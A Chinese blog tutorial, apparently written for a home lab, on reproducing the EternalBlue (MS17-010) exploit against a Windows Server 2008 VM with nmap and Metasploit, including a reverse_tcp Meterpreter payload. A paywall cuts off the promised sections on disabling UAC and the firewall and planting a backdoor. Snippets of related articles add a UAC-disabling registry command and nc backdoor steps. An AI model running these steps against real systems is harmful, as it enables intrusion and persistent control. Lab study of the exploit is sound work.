永恒之蓝漏洞复现及上传后门程序

最新推荐文章于 2023-10-16 19:40:44 发布
最新推荐文章于 2023-10-16 19:40:44 发布
阅读量3.7k 收藏 33
点赞数 1
文章标签: web安全 安全 安全漏洞 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dreamthe/article/details/121375464
版权

目录

1.安装靶机和攻击机

2.永恒之蓝复现

 3.永恒之蓝利用之远程桌面登录。

 4.远程桌面登录遇到问题

4.1密码策略

4.2支不支持远程桌面

 5.关闭主机防护策略并开启后门

5.1查看用户、密码

5.2创建防火墙规则

5.3关闭UAC

 5.4开启默认共享

5.5使用 use exploit/windows/smb/psexec

5.5.1psexec简单了解

5.5.2使用具体步骤

 6.上传后门

6.1上次后门程序

 6.2设置键值

1.安装靶机和攻击机

首先自己是在虚拟机完成的 靶场镜像地址MSDN, 我告诉你 - 做一个安静的工具站,我选择的win server 2008  R2 这里记得在安装虚拟机的时候选择桥接模式,这样你的虚拟机和物理机或者其他虚拟机都是一个网段的。

kali的下载地址:Get Kali | Kali Linux  在虚拟机里面直接选择打开就可以了。

 攻击机 kali ip是192.168.3.138

靶机 win server 2008  R2  ip是192.168.3.147

2.永恒之蓝复现

1.首先知道你靶机和攻击机的IP地址

 

2.可以kali里面 用nmap扫描靶机开了那些端口,可以看到开了135,445,4915这些端口开放。这个命令会扫一下常用的端口是否开放哦

3.输入msfdb run 进入msf中,这利每次都会出现不一样的图案,感觉有种小惊喜。这次是一个鸭子。

 4.开始搜索ms17_010  命令 search ms17_010

 5.先使用aux模块扫描靶机有无漏洞  步骤如下

第一步 使用扫描模块 use auxiliary/scanner/smb/smb_ms17_010 

第二步 查看那些参数需要设置 show options

第三步 设置靶机ip set RHOSTS 192.168.3.147

第四步 运行 run

如果看到Host is likely VULNERABLE to MS17-010! - Windows Server 2008 HPC Edition 7600 x64 (64-bit)表示该靶机很容易受到ms17-010的攻击

 6.开始利用exploit模块进行攻击了。

第一步 使用攻击模块 use exploit/windows/smb/ms17_010_eternalblue

第二步 查看那些参数需要设置 show options

第三步 设置靶机ip set RHOSTS 192.168.3.147,

不需要设置payloads 因为我的kali自动就有设置好了,主要设置是攻击机的IP地址和端口,因为要建立会话,没有对象怎么谈恋爱呢。如果需要改动自己再设置。(怕有的人不会设置补充一下,set payload windows/x64/meterpreter/reverse_tcp.后面你跟你要使用的payload就可以了,可以通过shows payload查看所以payload)

第四步 运行 run

 7.看到这个就是攻击成功了。建立了一个会话。

最低0.47元/天 解锁文章
糊涂是福yyyy
关注
[系统安全] 二十五.WannaCry勒索病毒分析 (1)Python复现永恒之蓝漏洞实现勒索加密
杨秀璋的专栏
02-27 1万+
作者前文介绍了逆向分析之OllyDbg动态调试工具,包括INT3断点、反调试、硬件断点和内存断点。这篇文章将分享新知识,最近WannaRen勒索软件爆发(下图是安天的分析攻击流程),其名称和功能与WannaCry相似,所以接下来作者将连续分享WannaCry勒索病毒的复现及分析,第一篇文章将采用Github资源实现永恒之蓝漏洞利用及Windows7系统文件加密。希望这系列文章对您有所帮助,漫漫长征路,偏向虎山行。享受过程,一起加油~
[网络安全自学篇] 六十七.WannaCry勒索病毒复现及分析(一)Python利用永恒之蓝及Win7勒索加密
杨秀璋的专栏
04-14 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的DC-1题目,通过信息收集、CMS漏洞搜索、Drupal漏洞利用、Metasploit反弹shell、提权及数据库爆破获取flag。这篇文章将分享新知识,最近WannaRen勒索软件爆发(下图是安天的分析攻击流程),其名称和功能与WannaCry相似,所以接下来作者将连续分享WannaCry勒索病毒的复现及分析,希望这篇基础性文章对您有所帮助。
Msfconsole使用永恒之蓝入侵Win7并上传执行可执行文件
简介
04-30 2761
我昨天我测试了,没成功所以SSH爆破先不写了,我已经把永恒之蓝漏洞玩明白了,这回是采用实战的方式进行入侵。提示:以下是本篇文章正文内容,下面案例可供参考本文就是讲解远程控制并执行文件。
关于NSA的EternalBlue(永恒之蓝) ms17-010漏洞利用
热门推荐
cnbluerain的博客
05-19 2万+
NSA的EternalBlue(永恒之蓝) ms17-010 漏洞利用
永恒之蓝(EternalBlue)MS17-010
aopingying8163的博客
06-25 494
附加知识: 漏洞来源与背景: 这个漏洞最初是由NSA(美国国家安全局)发现的,但是他们发现漏洞他不讲,然后遭殃了吧。 后来 有一个黑客组织叫:Shadow Brokers (影子经纪人) 入侵了NSA下属的黑客组织,窃取了大量的工具。 并且将部分的黑客工具公开到互联网上拍卖,当时预期公开的价格是100W比特币(价值近5亿美元),但一直都没人买。 要知道黑客都是有脾气的, 一气...
Win7利用NSA Eternalblue 永恒之蓝 和fuzzbunch工具实现dll注入 Win 7 64CN
Zyecho的博客
01-24 3355
Win7利用NSA Eternalblue 永恒之蓝 和fuzzbunch工具实现dll注入 Win 7 64CN 一、原理 1.Eternalblue可以利用SMB漏洞,结合Doublepulsar后,获取Windows 7 系统权限 2.漏洞存在环境 几乎所有开放455端口的Win系统 3. SMB 一个网络文件共享协议 二、实验准备 攻击机:win7 64 IP:192.168.226.128 靶机:win7 64 CN IP: 192.168.226.129 辅助攻击机:kali IP : 192.
永恒之蓝(ms17-010)简介与复现
weixin_52685785的博客
01-15 2835
一、永恒之蓝的介绍 ;二、漏洞描述 ;三、MSF介绍 ;四、漏洞复现
永恒之蓝(MS17-010)漏洞复现及msf常用渗透命令
Fengsheng96的博客
08-10 2612
环境部署 靶机:win7 工具机:kali,nessus 攻击步骤 1、nessus扫描靶机 根据扫描结果查看漏洞
漏洞CNNVD-201805-248的复现与提权
weixin_43434933的博客
06-23 1113
实验原理介绍(图文) 本次实验实现漏洞CNNVD-201805-248的复现与入侵,以及后续的提权管理员和留后门操作。 漏洞基本信息: 漏洞名称:Microsoft Windows VBScript 引擎安全漏洞 CNNVD编号:CNNVD-201805-248 CVE编号:CVE-2018-8174 危害等级:高危 漏洞类型:缓冲区错误 威胁类型:远程 发布时间:2018-05-10 漏洞简...
内网渗透——PSExec工具
tomyyyyy
04-16 898
内网渗透——PSExec工具 目录内网渗透——PSExec工具简介工作原理作为渗透工具的缺点使用流程定位域控无IPC连接有IPC连接Msf中的Psexec模块使用技巧remote UAC参考简介 PsExec 是由 Mark Russinovich 创建的 Sysinternals Suite中包含的工具。最初,它旨在作为系统管理员的便利工具,以便他们可以通过在远程主机上运行命令来执行维护任务。...
网络安全之渗透实战学习
最新发布
Innocence_0的博客
10-16 1242
对于SCF文件攻击,我们也可以通过下列方法来防止这种攻击的发生:1、使用Kerbeors认证或SMB签名;2、禁用共享文件给未认证用户所提供的写入权限;3、确保使用的是NTLMv2密码并增加口令的复杂程度。
ms17-010(永恒之蓝漏洞复现与处理
diaobusi的博客
06-05 1万+
ms17_010 是一种操作系统漏洞,仅影响 Windows 系统中的 SMBv1 服务。这个漏洞是由于 SMBv1 内核函数中的缓冲区溢出而导致的。攻击者可以通过该漏洞控制目标系统,并执行任意代码。这个漏洞通过 445 文件共享端口进行利用,一旦攻击者成功利用该漏洞,就可以在目标主机上植入各种恶意软件,如勒索软件。最近出现的 WannaCry 勒索软件就使用 ms17_010 漏洞来传播和植入勒索代码,将目标系统中的所有文件加密并威胁用户付款。
命令行禁用 UAC
zengqf的专栏
11-07 7772
C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f 0为禁用 1为默认 Key: SOFTWA
记一次MSF永恒之蓝入侵win7系统实验
weixin_62297109的博客
12-31 3080
MSF是渗透安全人员非常重要的,必须了解的一个软件,这次实验记录一些msf最基础最简单的用法和命令,希望对大家入门有所帮助
nc后门
zgwz123456的博客
03-21 1816
实验环境 靶 机:windows 7 攻击机:kali 漏洞利用:ms17-010 msfconsole use exploit/windows/smb/ms17_010_eternalbule set payload windows/x64/meterpreter/reverse_tcp set rhosts 192.168.21.134 set lhost 192.168.21.130 set lport 6666 run 拿到权限后上传我们的nc后门程序(我把它改名成了qq) 查看启动项的键值项,
metasploit渗透测试笔记(内网渗透篇)
baidu_22850205的专栏
11-02 984
0x01 reverse the shell File 通常做法是使用msfpayload生成一个backdoor.exe然后上传到目标机器执行。本地监听即可获得meterpreter shell。 reverse_tcp/http/https => exe => victim => shell reverse_tcp windows: msfpayload wi
python 内网穿透_内网渗透(十五) | psexec工具使用浅析(admin$)
weixin_39779928的博客
12-10 1164
作者:谢公子CSDN安全博客专家,擅长渗透测试、Web安全攻防、红蓝对抗。其自有公众号:谢公子学安全免责声明:本公众号发布的文章均转载自互联网或经作者投稿授权的原创,文末已注明出处,其内容和图片版权归原网站或作者本人所有,并不代表 安世加 的观点,若有无意侵权或转载不当之处请联系我们处理,谢谢合作!欢迎各位添加微信号:qinchang_198231 加入 安世加 交流群 和大佬们一起交...
永恒之蓝漏洞渗透测试Win7系统实验中遇到的问题与解决方法
06-12
在进行永恒之蓝漏洞渗透测试Win7系统实验的过程中,可能会遇到以下问题: 1. 漏洞扫描器无法扫描到永恒之蓝漏洞:这可能是因为目标系统已经安装了相关的安全补丁。解决方法是查看目标系统的安全补丁情况,或使用其他漏洞扫描器进行扫描。 2. 永恒之蓝漏洞攻击失败:这可能是因为目标系统的防火墙或安全软件拦截了攻击流量。解决方法是关闭防火墙或安全软件,或使用其他攻击方式。 3. 后门程序无法执行:这可能是因为目标系统的安全策略或权限设置不允许执行后门程序。解决方法是修改安全策略或提升权限。 4. 数据窃取失败:这可能是因为目标网络中没有敏感数据或者敏感数据已经被加密或隐藏。解决方法是寻找其他可利用的漏洞,或进行更深入的渗透测试。 需要注意的是,进行永恒之蓝漏洞渗透测试需要遵守法律法规,仅限于安全测试和研究用途,切勿用于非法行为。同时,对于漏洞攻击和数据窃取等行为,应根据实际情况进行风险评估和合规审查。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值